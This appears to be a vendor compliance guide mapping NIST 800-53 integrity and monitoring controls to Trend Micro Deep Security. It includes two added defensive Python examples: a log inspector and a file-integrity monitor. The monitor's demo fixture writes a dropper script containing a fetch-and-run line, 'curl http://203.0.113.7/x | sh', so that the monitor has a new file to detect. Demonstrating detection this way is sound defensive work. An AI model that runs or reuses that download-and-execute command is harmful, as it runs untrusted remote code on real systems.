Supplemental Guidance: The capability to dynamically isolate or segregate certain internal components of organizational information systems is useful when it is necessary to partition or separate certain components of dubious origin from those components possessing greater trustworthiness. Component isolation reduces the attack surface of organizational information systems. Isolation of selected information system components is also a means of limiting the damage from successful cyber attacks when those attacks occur.
Trend Micro Solution Compliancy: The Deep Security firewall, as an EAL2-evaluated mechanism, can be used to create the implied Trust Zone architectures in physical and virtualized environments through the use of the Deep Security Virtual Appliance. Deep Security also supports this requirement through its support of VMware NSX, tagging infected virtual machines and allowing them to be automatically quarantined.
SI-3 (2) System and Information Integrity / Malicious Code Protection / Automatic Updates
Priority & Baselines: P1; M, H; CNSSI; FedRAMP
Control: The information system automatically updates malicious code protection mechanisms.
Supplemental Guidance: Malicious code protection mechanisms include, for example, signature definitions. Due to information system integrity and availability concerns, organizations give careful consideration to the methodology used to carry out automatic updates. Related control: SI-8.
Trend Micro Solution Compliancy: Deep Security performs real-time, scheduled, and on-demand scans for file-based viruses based upon known signatures, automatically updates and applies Deep Security signatures, engines, patterns, and rules/filters to detect/prevent exploitation of known vulnerabilities, and produces reports which can be used to support continuous monitoring.
TrendLabs carries out all virus research and case analysis for Trend Micro and its customers. It designs and tests virus pattern files and refines the scan engine to keep Trend Micro technology up to date and effective against the latest threats. During virus outbreaks, TrendLabs implements strict "Red Alert" escalation procedures to notify users and produce cures as quickly as possible. Trend Micro's virus doctors usually develop an initial "fix" for a major new virus in 45 minutes or less, which can be distributed through the active update mechanism. TrendLabs also educates users about security threats and promotes safe computing by compiling virus definitions and other useful information on the company's web site.
SI-3 (4) System and Information Integrity / Malicious Code Protection / Updates Only by Privileged Users
The information system updates malicious code protection mechanisms only when directed by a privileged user.
Supplemental Guidance:
This control enhancement may be appropriate for situations where, for reasons of security or operational continuity, updates are only applied when selected/approved by designated organizational personnel. Related controls: AC-6, CM-5.
Trend Micro Deep Security: The Deep Security Manager controls all updates to the Deep Security system, including the anti-virus, malicious code, intrusion detection and prevention mechanisms. Only users with escalated privileges can access the Deep Security Manager.
SI-3 (7) System and Information Integrity / Malicious Code Protection / Nonsignature-Based Detection (FedRAMP)
The information system implements nonsignature-based malicious code detection mechanisms.
Supplemental Guidance:
Nonsignature-based detection mechanisms include, for example, the use of heuristics to detect, analyze, and describe the characteristics or behavior of malicious code and to provide safeguards against malicious code for which signatures do not yet exist or for which existing signatures may not be effective. This includes polymorphic malicious code (i.e., code that changes signatures when it replicates). This control enhancement does not preclude the use of signature-based detection mechanisms.
Trend Micro Deep Security: The Deep Security solution implements, within the anti-virus and deep packet inspection functionality, heuristic techniques to complement the more commonly used signature-based techniques.
SI-3 (8) System and Information Integrity / Malicious Code Protection / Detect Unauthorized Commands
The information system detects [Assignment: organization-defined unauthorized operating system commands] through the kernel application programming interface at [Assignment: organization-defined information system hardware components] and [Selection (one or more): issues a warning; audits the command execution; prevents the execution of the command].
Supplemental Guidance:
This control enhancement can also be applied to critical interfaces other than kernel-based interfaces, including for example, interfaces with virtual machines and privileged applications. Unauthorized operating system commands include, for example, commands for kernel functions from information system processes that are not trusted to initiate such commands, or commands for kernel functions that are suspicious even though commands of that type are reasonable for processes to initiate.
Organizations can define the malicious commands to be detected by a combination of command types, command classes, or specific instances of commands. Organizations can define hardware components by specific component, component type, location in the network, or combination therein. Organizations may select different actions for different types/classes/specific instances of potentially malicious commands. Related control: AU-6.
Trend Micro Deep Security: Deep Security can prevent the execution of malicious commands, files or actions. The Deep Security solution implements deep packet inspection functionality to determine when suspect commands are being received by the targeted physical or virtual machine. When suspicious activity or a series of suspicious commands is observed, an alert is sent to the Deep Security Manager or to the SIEM system to inform the system administrator of the security event taking place. Further, Deep Security Integrity Monitoring supports satisfying this requirement by ensuring that configuration files and specific commands have not been modified prior to execution. Note that this detection operates on network traffic and on file integrity rather than at the kernel application programming interface named in the control statement.
SI-3 (10) System and Information Integrity / Malicious Code Protection / Malicious Code Analysis (CNSSI)
The organization:
a) Employs [Assignment: organization-defined tools and techniques] to analyze the characteristics and behavior of malicious code; and
b) Incorporates the results from malicious code analysis into organizational incident response and flaw remediation processes.
Supplemental Guidance:
The application of selected malicious code analysis tools and techniques provides organizations with a more in-depth understanding of adversary tradecraft (i.e., tactics, techniques, and procedures) and the functionality and purpose of specific instances of malicious code. Understanding the characteristics of malicious code facilitates more effective organizational responses to current and future threats. Organizations can conduct malicious code analyses by using reverse engineering techniques or by monitoring the behavior of executing code.
Trend Micro Deep Security: Deep Security supports satisfying this requirement through real-time, scheduled, and on-demand scans for file-based viruses and malware based upon known signatures. Deep Security performs scheduled scans at the time and frequency configured by the authorized administrator. This functionality is supported by the Trend Micro Smart Protection Network for malware analysis, which provides a response to the continuous emergence of new threats. New threats appear at a rate of 1.5 every second; historically, detection methods required virus signature files which then had to be delivered to on-premises equipment, causing network load, memory usage, and system load to increase daily.
The Trend Micro Smart Protection Network works by storing the information required for security countermeasures in a cloud database rather than on individual computers, with Trend Micro carrying out updates and management via the cloud. The long-term growth in work and system load produced by delivering virus signature files is therefore eliminated, while simultaneously providing greater security countermeasures. In this arrangement the analysis of malicious code characteristics is performed by Trend Micro; the organization consumes its results through signature and reputation updates.
The Trend Micro Smart Protection Network uses a global network of threat intelligence sensors to continually update email, web, and file reputation databases in the cloud, identifying and blocking threats in real time before they reach the organization requiring the protection.
SI-4 (3) System and Information Integrity / Information System Monitoring / Automated Tool Integration
The organization employs automated tools to integrate intrusion detection tools into access control and flow control mechanisms for rapid response to attacks by enabling reconfiguration of these mechanisms in support of attack isolation and elimination.
Trend Micro Deep Security: The Deep Security Log Inspection module monitors specified log files in real time and reacts to changes to the files as they occur. Deep Security Intrusion Prevention automatically delivers rules that shield newly discovered vulnerabilities within hours, and the rules can be pushed out to thousands of servers in minutes, without a system reboot.
SI-4 (4) System and Information Integrity / Information System Monitoring / Inbound and Outbound Communications Traffic (P1; MH; CNSSI; FedRAMP)
The information system monitors inbound and outbound communications traffic [Assignment: organization-defined frequency] for unusual or unauthorized activities or conditions.
Supplemental Guidance:
Unusual/unauthorized activities or conditions related to information system inbound and outbound communications traffic include, for example, internal traffic that indicates the presence of malicious code within organizational information systems or propagating among system components, the unauthorized exporting of information, or signaling to external information systems. Evidence of malicious code is used to identify potentially compromised information systems or information system components.
Trend Micro Deep Security: The Deep Security deep packet inspection engine intelligently examines the content of network traffic entering and leaving hosts. The traffic is inspected for protocol deviations, content that signals an attack, or policy violations. Intrusion Prevention protects operating systems, commercial off-the-shelf applications, and custom web applications against attacks such as SQL injection and cross-site scripting. Detailed events provide valuable information, including the source of the attack, the time, and what the potential intruder was attempting to exploit.
SI-4 (5) System and Information Integrity / Information System Monitoring / System-Generated Alerts (P1; MH; CNSSI; FedRAMP)
The information system alerts [Assignment: organization-defined personnel or roles] when the following indications of compromise or potential compromise occur: [Assignment: organization-defined compromise indicators].
Supplemental Guidance:
Alerts may be generated from a variety of sources, including, for example, audit records or inputs from malicious code protection mechanisms, intrusion detection or prevention mechanisms, or boundary protection devices such as firewalls, gateways, and routers. Alerts can be transmitted, for example, telephonically, by electronic mail messages, or by text messaging. Organizational personnel on the notification list can include, for example, system administrators, mission/business owners, system owners, or information system security officers. Related controls: AU-5, PE-6.
Trend Micro Deep Security: Deep Security supports this control through its ability to automatically produce and distribute alerts and reports as required by an organization's policies. Deep Security Alerts are raised when situations occur that require special attention. Alerts can be raised due to security events such as the detection of malware or an abnormal restart on a protected computer, or they can be system events like the Deep Security Manager running low on disk space. Deep Security can be configured to send email notifications when specific Alerts are raised.
SI-4 (7) System and Information Integrity / Information System Monitoring / Automated Response to Suspicious Events
The information system notifies [Assignment: organization-defined incident response personnel (identified by name and/or by role)] of detected suspicious events and takes [Assignment: organization-defined least-disruptive actions to terminate suspicious events].
Supplemental Guidance:
Least-disruptive actions may include, for example, initiating requests for human responses.
Trend Micro Deep Security: Deep Security supports this control by:
- providing notifications and, when in inline mode, operating in either Detect mode or Prevent mode. In Detect mode, traffic that would normally be dropped generates events but is allowed to pass, which corresponds to the least-disruptive action in the control: the event is raised for a human to act on without traffic being blocked. In Prevent mode, Intrusion Prevention rules are applied to traffic and the related log events are generated;
- generating, via the Deep Security Agent and the Deep Security Manager, diagnostic packages to support the testing of intrusion monitoring tools; and
- using Log Inspection to forward suspicious events to a SIEM system or centralized logging server for correlation, reporting and archiving.
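The last bullet, log inspection feeding a SIEM, is easiest to picture with working code. The block below is an added illustration, not Deep Security's Log Inspection engine: a small rule table is run over constructed sshd log lines, a correlation rule fires after repeated failures from one source, and only events whose assumed severity reaches a forwarding threshold are rendered as RFC 5424 syslog messages. The rule ids, the 0-10 severity scale, the threshold, the facility and the sample log are all assumptions.

```python
"""Added example, not Deep Security's Log Inspection engine: a small rule-based
log inspector run over constructed sshd lines.  Each rule carries an assumed
severity on a 0-10 scale; events at or above FORWARD_THRESHOLD are rendered as
RFC 5424 syslog messages for a SIEM, the rest stay in the local event list.
Rule ids, the threshold, the facility and the sample log are assumptions."""
import re
from collections import defaultdict

FORWARD_THRESHOLD = 6      # assumption: only severity >= 6 leaves the host
SYSLOG_FACILITY = 16       # local0
BRUTE_FORCE_COUNT = 5      # assumption: 5 failures from one source in the batch

# Per-line rules: (rule id, pattern, severity, description).  Each pattern must
# capture the source address as 'src'.
RULES = [
    (1001, re.compile(r"Failed password for (?:invalid user )?\S+ from (?P<src>\S+)"), 5,
     "SSH authentication failure"),
    (1002, re.compile(r"Accepted \w+ for root from (?P<src>\S+)"), 8,
     "Interactive root login over SSH"),
]
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<msg>.*)$")

# Constructed sample log: five failures from one address, one stray failure, a root login.
SAMPLE_LOG = """\
2015-09-10T08:00:01Z web01 sshd[4321]: Failed password for invalid user admin from 203.0.113.7 port 50122 ssh2
2015-09-10T08:00:02Z web01 sshd[4322]: Failed password for invalid user admin from 203.0.113.7 port 50123 ssh2
2015-09-10T08:00:03Z web01 sshd[4323]: Failed password for root from 203.0.113.7 port 50124 ssh2
2015-09-10T08:00:04Z web01 sshd[4324]: Failed password for invalid user oracle from 203.0.113.7 port 50125 ssh2
2015-09-10T08:00:05Z web01 sshd[4325]: Failed password for root from 203.0.113.7 port 50126 ssh2
2015-09-10T08:01:10Z web01 sshd[4330]: Failed password for alice from 10.0.0.5 port 50130 ssh2
2015-09-10T08:02:00Z web01 sshd[4335]: Accepted password for root from 10.0.0.9 port 50140 ssh2
2015-09-10T08:02:05Z web01 sshd[4335]: pam_unix(sshd:session): session opened for user root by (uid=0)
"""


def inspect(lines):
    """Match every line against the rule table; a correlation rule (1003) fires when
    one source reaches BRUTE_FORCE_COUNT authentication failures."""
    events, failures = [], defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        for rule_id, pattern, severity, desc in RULES:
            pm = pattern.search(m["msg"])
            if not pm:
                continue
            event = {"rule": rule_id, "severity": severity, "desc": desc,
                     "src": pm["src"], "ts": m["ts"], "host": m["host"]}
            events.append(event)
            if rule_id == 1001:
                failures[event["src"]] += 1
                if failures[event["src"]] == BRUTE_FORCE_COUNT:
                    events.append(dict(event, rule=1003, severity=10,
                                       desc="SSH brute-force attempt (%d failures)" % BRUTE_FORCE_COUNT))
    return events


def syslog_severity(rule_severity):
    """Map the 0-10 rule scale onto syslog's 0 (emerg) .. 7 (debug)."""
    return 7 - rule_severity * 7 // 10


def render_syslog(event):
    """RFC 5424 layout: <PRI>VERSION TIMESTAMP HOST APP PROCID MSGID [SD] MSG."""
    pri = SYSLOG_FACILITY * 8 + syslog_severity(event["severity"])
    sd = '[loginspect rule="%d" severity="%d" src="%s"]' % (event["rule"], event["severity"], event["src"])
    return "<%d>1 %s %s loginspect - %d %s %s" % (pri, event["ts"], event["host"], event["rule"], sd, event["desc"])


def forward(events, threshold=FORWARD_THRESHOLD):
    """Only events at or above the threshold are rendered for the SIEM."""
    return [render_syslog(e) for e in events if e["severity"] >= threshold]


if __name__ == "__main__":
    for msg in forward(inspect(SAMPLE_LOG.splitlines())):
        print(msg)
```

Run as a script it prints two messages: the brute-force correlation event and the root login. The six individual failures stay local because they sit below the threshold; raising the threshold to 9 would also keep the root login on the host, which is the trade-off a practitioner tunes when the SIEM licence is priced per event.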
SI-4 (9) System and Information Integrity / Information System Monitoring / Testing of Monitoring Tools
The organization tests intrusion-monitoring tools [Assignment: organization-defined frequency].
Supplemental Guidance:
Testing intrusion-monitoring tools is necessary to ensure that the tools are operating correctly and continue to meet the monitoring objectives of organizations. The frequency of testing depends on the types of tools used by organizations and methods of deployment. Related control: CP-9.
SI-4 (11) System and Information Integrity / Information System Monitoring / Analyze Communications Traffic Anomalies (CNSSI)
The organization analyzes outbound communications traffic at the external boundary of the information system and selected [Assignment: organization-defined interior points within the system (e.g., subnetworks, subsystems)] to discover anomalies.
Supplemental Guidance:
Anomalies within organizational information systems include, for example, large file transfers, long-time persistent connections, unusual protocols and ports in use, and attempted communications with suspected malicious external addresses.
SI-4 (12) System and Information Integrity / Information System Monitoring / Automated Alerts (CNSSI)
The organization employs automated mechanisms to alert security personnel of the following inappropriate or unusual activities with security implications: [Assignment: organization-defined activities that trigger alerts].
Supplemental Guidance:
This control enhancement focuses on the security alerts generated by organizations and transmitted using automated means. In contrast to the alerts generated by information systems in SI-4 (5), which tend to focus on information sources internal to the systems (e.g., audit records), the sources of information for this enhancement can include other entities as well (e.g., suspicious activity reports, reports on potential insider threats). Related controls: AC-18, IA-3.
SI-4 (13) System and Information Integrity / Information System Monitoring / Analyze Traffic / Event Patterns
The organization:
a) Analyzes communications traffic/event patterns for the information system;
b) Develops profiles representing common traffic patterns and/or events; and
c) Uses the traffic/event profiles in tuning system-monitoring devices to reduce the number of false positives and the number of false negatives.
Trend Micro Deep Security: Deep Security Intrusion Prevention is a high-performance deep packet inspection engine which intelligently examines the content of network traffic entering and leaving hosts. The traffic is inspected for protocol deviations, content that signals an attack, or policy violations. Intrusion Prevention protects operating systems, commercial off-the-shelf applications, and custom web applications against attacks such as SQL injection and cross-site scripting. Detailed events provide valuable information, including the source of the attack, the time, and what the potential intruder was attempting to exploit.
The Deep Security Web Reputation module implements security levels, which determine whether Deep Security will allow or block access to a URL. For example, if the security level is set to Low, Deep Security will only block URLs that are known to be Web threats. As the security level is set higher, the Web threat detection rate improves but the possibility of false positives also increases.
The Deep Security Log Inspection module monitors specified log files in real time and reacts to changes to the files as they occur.
SI-4 (15) System and Information Integrity / Information System Monitoring / Wireless to Wireline Communications (CNSSI)
The organization employs an intrusion detection system to monitor wireless communications traffic as the traffic passes from wireless to wireline networks.
Supplemental Guidance: Related control: AC-18.
Trend Micro Deep Security: Deep Security Firewall rules for wireless laptops partially support compliance with this requirement. With many laptops now capable of connecting to both wired and wireless networks, users need to be aware of the problems that can result from this scenario. The common problem is a "network bridge" configured between the wired and wireless networks, which risks forwarding internal traffic externally and potentially exposing internal hosts to external attacks. Deep Security allows administrators to configure a set of firewall rules for these types of users to prevent them from creating a network bridge. This is a host-level control on the endpoint; it does not by itself monitor the traffic crossing the wireless-to-wireline boundary, which is why the support is partial.
SI-4 (23) System and Information Integrity / Information System Monitoring / Host-Based Devices (CNSSI; FedRAMP)
The organization implements [Assignment: organization-defined host-based monitoring mechanisms] at [Assignment: organization-defined information system components].
Supplemental Guidance:
Information system components where host-based monitoring can be implemented include, for example, servers, workstations, and mobile devices. Organizations consider employing host-based monitoring mechanisms from multiple information technology product developers.
Trend Micro Deep Security: Deep Security is a host-based protection solution, in physical and virtualized environments, providing information system monitoring through the functionality associated with DPI, Firewall, Anti-Virus, Integrity Monitoring, and Log Inspection, as described under SI-4.
SI-4 (24) System and Information Integrity / Information System Monitoring / Indicators of Compromise
The information system discovers, collects, distributes, and uses indicators of compromise.
Supplemental Guidance:
Indicators of compromise (IOC) are forensic artifacts from intrusions that are identified on organizational information systems (at the host or network level). IOCs provide organizations with valuable information on objects or information systems that have been compromised. IOCs for the discovery of compromised hosts can include, for example, the creation of registry key values. IOCs for network traffic include, for example, Universal Resource Locator (URL) or protocol elements that indicate malware command and control servers. The rapid distribution and adoption of IOCs can improve information security by reducing the time that information systems and organizations are vulnerable to the same exploit or attack.
Trend Micro Deep Security: Deep Security, through the Integrity Monitoring capability, detects and reports malicious and unexpected changes to files and the system registry in real time, and gives administrators the ability to track both authorized and unauthorized changes made to the instance. The ability to detect unauthorized changes (the host-level IOCs described above) is a critical component, as it provides visibility into changes that could indicate the compromise of an instance.
SI-5 System and Information Integrity / Security Alerts, Advisories and Directives
SI-5 System and Information Integrity / Security Alerts, Advisories, and Directives (P1; LMH; CNSSI)
The organization:
a) Receives information system security alerts, advisories, and directives from [Assignment: organization-defined external organizations] on an ongoing basis;
b) Generates internal security alerts, advisories, and directives as deemed necessary;
c) Disseminates security alerts, advisories, and directives to: [Selection (one or more): [Assignment: organization-defined personnel or roles]; [Assignment: organization-defined elements within the organization]; [Assignment: organization-defined external organizations]]; and
d) Implements security directives in accordance with established time frames, or notifies the issuing organization of the degree of noncompliance.
Supplemental Guidance:
The United States Computer Emergency Readiness Team (US-CERT) generates security alerts and advisories to maintain situational awareness across the federal government. Security directives are issued by OMB or other designated organizations with the responsibility and authority to issue such directives. Compliance to security directives is essential due to the critical nature of many of these directives and the potential immediate adverse effects on organizational operations and assets, individuals, other organizations, and the Nation should the directives not be implemented in a timely manner. External organizations include, for example, external mission/business partners, supply chain partners, external service providers, and other peer/supporting organizations. Related control: SI-2.
Trend Micro Deep Security: Deep Security can assist in supporting this control by providing security alerts to the organization; security alert data can be exported to syslog servers. The frequency of alerts is configurable.
SI-5 (1) System and Information Integrity / Security Alerts, Advisories, and Directives / Automated Alerts and Advisories (P1; H; CNSSI)
The organization employs automated mechanisms to make security alert and advisory information available throughout the organization.
Supplemental Guidance:
The significant number of changes to organizational information systems and the environments in which those systems operate requires the dissemination of security-related information to a variety of organizational entities that have a direct interest in the success of organizational missions and business functions. Based on the information provided by the security alerts and advisories, changes may be required at one or more of the three tiers related to the management of information security risk including the governance level, mission/business process/enterprise architecture level, and the information system level.
SI-7 System and Information Integrity / Software, Firmware and Information Integrity
SI-7 System and Information Integrity / Software, Firmware, and Information Integrity (P1; MH; CNSSI; FedRAMP)
The organization employs integrity verification tools to detect unauthorized changes to [Assignment: organization-defined software, firmware, and information].
Supplemental Guidance:
Unauthorized changes to software, firmware, and information can occur due to errors or malicious activity (e.g., tampering). Software includes, for example, operating systems (with key internal components such as kernels, drivers), middleware, and applications. Firmware includes, for example, the Basic Input Output System (BIOS). Information includes metadata such as security attributes associated with information. State-of-the-practice integrity-checking mechanisms (e.g., parity checks, cyclical redundancy checks, cryptographic hashes) and associated tools can automatically monitor the integrity of information systems and hosted applications. Related controls: SA-12, SC-8, SC-13, SI-3.
Trend Micro Deep Security: The Deep Security solution supports the integrity verification of software and information through the Integrity Monitoring functionality. Integrity Monitoring monitors critical system objects such as files, folders, registry entries, processes, services, and listening ports and detects any changes that happen to those objects. Integrity Monitoring works by comparing the current condition of a monitored object with an existing baseline. When an integrity event occurs for a rule that has the alert feature enabled, an alert is generated for the Deep Security administrator. Baselines are created when the integrity rule is assigned. The baseline snapshot is stored in the DSA (Deep Security Agent) or, in the virtualized environment, the DSVA as a SQLite3 database file containing hashes, which is uploaded to the DSM (Deep Security Manager). Baselines consist of a combination of the following object attributes: Created, Last Modified, Last Accessed, Permissions, Owner, Group, Size, Hash (SHA1, SHA256, MD5), Flags, SymLinkPath, Inode Number, Device Number, Blocks Allocated. Of the three hash options, SHA256 is the one to rely on for detecting deliberate tampering: MD5 collisions are practical and SHA1 is deprecated for that purpose, whereas either remains adequate for spotting accidental corruption.
SI-7 (1) System and Information Integrity / Software, Firmware, and Information Integrity / Integrity Checks (P1; MH; CNSSI; FedRAMP)
The information system performs an integrity check of [Assignment: organization-defined software, firmware, and information] [Selection (one or more): at startup; at [Assignment: organization-defined transitional states or security-relevant events]; [Assignment: organization-defined frequency]].
Supplemental Guidance:
Security-relevant events include, for example, the identification of a new threat to which organizational information systems are susceptible, and the installation of new hardware, software, or firmware. Transitional states include, for example, system startup, restart, shutdown, and abort.
Trend Micro Deep Security: Triggers are used to compare the monitored system object with its baseline. The triggers can be Manual, Real-time On Change, and Pseudo real-time. The Manual or On-demand trigger is an administrator-initiated comparison started from the DSM console. The On-Change trigger uses the ReadDirectoryChangesW function in the Windows API to alert an administrator that a modification to a security-critical object being monitored has taken place; as described here, this real-time trigger relies on a Windows mechanism. The Pseudo-real-time trigger is carried out by constant scans of the host machine for changes to the security-critical objects being monitored. An algorithm is used to determine the appropriate scanning interval based on how long it takes to scan all system areas, which prevents scans from overwhelming the host machine.
Rules: Administrators can use built-in templates to monitor files, directories, and Registry entries. Custom rules can be written to cover listening ports, processes and services.
SI-7 (3) System and Information Integrity / Software, Firmware, and Information Integrity / Centrally Managed Integrity Tools
The organization employs centrally managed integrity verification tools.
Supplemental Guidance: Related controls: AU-3, SI-2, SI-8.
Trend Micro Deep Security: Rules can be developed by the administrator to monitor service attributes such as: Permissions; Owner; Group; BinaryPathName; Description; State; StartType; LogOnAs; FirstFailure; SecondFailure; SubsequentFailures; ResetFailCountAfter; RunProgram; DependsOn; LoadOrderGroup; ProcessID; and changes to registry service keys.
The Deep Security Agent and Deep Security Manager components are published with a SHA256 checksum when the components are downloaded from the Trend Micro product download web site. The checksum of the downloaded installer should be verified against the published value before deployment; note that a checksum served from the same site as the installer detects corruption in transit but not substitution by whoever controls that site.
SI-7 (5) System and Information Integrity / Software, Firmware, and Information Integrity / Automated Response to Integrity Violations (P1; H; CNSSI)
The information system automatically [Selection (one or more): shuts the information system down; restarts the information system; implements [Assignment: organization-defined security safeguards]] when integrity violations are discovered.
Supplemental Guidance:
Organizations may define different integrity checking and anomaly responses: (i) by type of information (e.g., firmware, software, user data); (ii) by specific information (e.g., boot firmware, boot firmware for a specific types of machines); or (iii) a combination of both. Automatic implementation of specific safeguards within organizational information systems includes, for example, reversing the changes, halting the information system, or triggering audit alerts when unauthorized modifications to critical security files occur.
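The baseline-and-compare mechanism described under SI-7 and SI-7 (1), and the checksum check mentioned under SI-7 (3), are worth seeing in working code. The block below is an added illustration, not Deep Security code: it records a baseline of the attributes the page lists (size, permissions, owner, group, last-modified time, inode, device, symlink target and SHA-1/SHA-256/MD5 digests) in a SQLite database, re-reads the objects on a later trigger and reports every attribute that differs. The table layout, the scan-interval policy in next_scan_interval(), the verify_download() helper and the sample files are assumptions; last-accessed time is deliberately not compared, because it changes on every read and would only produce noise.

```python
"""Added example, not Deep Security code: a minimal host file-integrity monitor in the
shape the SI-7 text describes.  A baseline of each monitored object's attributes (size,
permissions, owner, group, last-modified time, inode, device, symlink target and the
SHA-1/SHA-256/MD5 digests) is kept in a SQLite database; a later trigger re-reads the
objects and reports every attribute that differs.  The table layout, the scan-interval
policy, verify_download() and the sample files are assumptions, not product behaviour."""
import hashlib, hmac, json, os, sqlite3, stat, tempfile

HASH_ALGS = ("sha1", "sha256", "md5")

def file_digests(path):
    """Read the file once and feed every digest from the same chunks."""
    hashers = {alg: hashlib.new(alg) for alg in HASH_ALGS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            for h in hashers.values():
                h.update(chunk)
    return {alg: h.hexdigest() for alg, h in hashers.items()}

def snapshot(path):
    """Baseline attributes of one object.  Last-accessed time is left out on purpose:
    it changes on every read and would only produce noise."""
    st = os.lstat(path)
    rec = {"size": st.st_size, "permissions": oct(stat.S_IMODE(st.st_mode)),
           "owner": st.st_uid, "group": st.st_gid, "last_modified": int(st.st_mtime),
           "inode": st.st_ino, "device": st.st_dev}
    if stat.S_ISLNK(st.st_mode):
        rec["symlink_path"] = os.readlink(path)
    elif stat.S_ISREG(st.st_mode):
        rec.update(file_digests(path))
    return rec

def open_baseline(db_path=":memory:"):
    """Baseline store (the agent keeps its real one in a SQLite file)."""
    db = sqlite3.connect(db_path)
    db.execute("CREATE TABLE IF NOT EXISTS baseline (path TEXT PRIMARY KEY, attrs TEXT NOT NULL)")
    return db

def create_baseline(db, paths):
    """Equivalent of assigning an integrity rule: snapshot every monitored object."""
    db.executemany("INSERT OR REPLACE INTO baseline VALUES (?, ?)",
                   [(p, json.dumps(snapshot(p))) for p in paths])
    db.commit()

def compare(db, paths):
    """One trigger (manual, on-change or scheduled): diff the current state against the
    baseline.  Events are (path, attribute, old, new); created/deleted carry the record."""
    baseline = {p: json.loads(a) for p, a in db.execute("SELECT path, attrs FROM baseline")}
    events = []
    for p in sorted(set(paths) | set(baseline)):
        if p not in baseline:
            if os.path.lexists(p):
                events.append((p, "created", None, snapshot(p)))
        elif not os.path.lexists(p):
            events.append((p, "deleted", baseline[p], None))
        else:
            now = snapshot(p)
            for key in sorted(set(now) | set(baseline[p])):
                if now.get(key) != baseline[p].get(key):
                    events.append((p, key, baseline[p].get(key), now.get(key)))
    return events

def next_scan_interval(last_scan_seconds, min_interval=60.0, max_load=0.10):
    """Assumed policy for the pseudo-real-time trigger: scanning may take at most
    max_load of wall-clock time, so a 30 s scan repeats no sooner than every 300 s."""
    return max(min_interval, last_scan_seconds / max_load)

def verify_download(path, published_sha256):
    """SI-7 (3) check: compare an installer with its published SHA-256 before deploying it."""
    return hmac.compare_digest(file_digests(path)["sha256"], published_sha256.lower())

def _write(path, text):
    with open(path, "w") as fh:
        fh.write(text)

def demo():
    """Constructed scenario: baseline two files, then tamper with one, delete the other
    and drop a new script into the directory.  Returns the events found."""
    root = tempfile.mkdtemp()
    cfg, helper, dropper = (os.path.join(root, n) for n in ("sshd_config", "helper.sh", "dropper.sh"))
    _write(cfg, "PermitRootLogin no\n")
    _write(helper, "#!/bin/sh\necho ok\n")
    db = open_baseline()
    create_baseline(db, [cfg, helper])
    good_sha256 = file_digests(cfg)["sha256"]
    _write(cfg, "PermitRootLogin yes\n")                           # tamper: flip the setting
    os.remove(helper)                                               # delete a monitored object
    _write(dropper, "#!/bin/sh\ncurl http://203.0.113.7/x | sh\n")  # unexpected new file
    return {"events": compare(db, [cfg, helper, dropper]),
            "tampered_cfg_matches_published": verify_download(cfg, good_sha256)}

if __name__ == "__main__":
    for path, attribute, old, new in demo()["events"]:
        print("%s: %s %r -> %r" % (os.path.basename(path), attribute, old, new))
```

Run as a script, demo() reports the size and all three digests of sshd_config changing (the last-modified time as well, if the tamper lands in a later second), helper.sh as deleted and dropper.sh as created, while the inode of sshd_config is unchanged because the file was rewritten in place. The same hash computation serves verify_download(), which returns False for the tampered file; in practice the published value should come from a channel other than the download site itself.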
SI-7 (8) System and Information Integrity / Software, Firmware, and Information Integrity / Auditing Capability for Significant Events (CNSSI)
The information system, upon detection of a potential integrity violation, provides the capability to audit the event and initiates the following actions: [Selection (one or more): generates an audit record; alerts current user; alerts [Assignment: organization-defined personnel or roles]; [Assignment: organization-defined other actions]].
Supplemental Guidance:
Organizations select response actions based on types of software, specific software, or information for which there are potential integrity violations. Related controls: AU-2, AU-6, AU-12.
SI-7 (13) System and Information Integrity / Software, Firmware, and Information Integrity / Code Execution in Protected Environments
The organization allows execution of binary or machine-executable code obtained from sources with limited or no warranty and without the provision of source code only in confined physical or virtual machine environments and with the explicit approval of [Assignment: organization-defined personnel or roles].
Supplemental Guidance:
This control enhancement applies to all sources of binary or machine-executable code including, for example, commercial software/firmware and open source software.
Trend Micro Deep Security: The Deep Security solution supports compliance with this requirement by providing a series of security mechanisms in the physical or virtualized environment which can be configured to provide the isolation required from other system environments, such as Dev/Test/Production, in which to run binaries from sources with limited or no warranty and without the availability of the source code.